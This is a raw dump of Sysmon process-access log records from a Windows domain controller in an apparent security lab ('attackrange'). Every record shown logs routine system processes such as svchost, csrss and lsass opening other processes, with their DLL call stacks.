10341000x80000000000000005242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.112{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2601-00000000A301}804C:\Windows\System32\XblGameSaveTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E46-6005-1600-00000000A301}15442408C:\Windows\system32\svchost.exe{59A5CD1D-90A0-6005-2601-00000000A301}804C:\Windows\System32\XblGameSaveTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.096{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90A0-6005-2401-00000000A301}3664C:\Windows\system32\usoclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.096{59A5CD1D-90A0-6005-2501-00000000A301}41004108C:\Windows\system32\conhost.exe{59A5CD1D-90A0-6005-2401-00000000A301}3664C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2501-00000000A301}4100C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.081{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
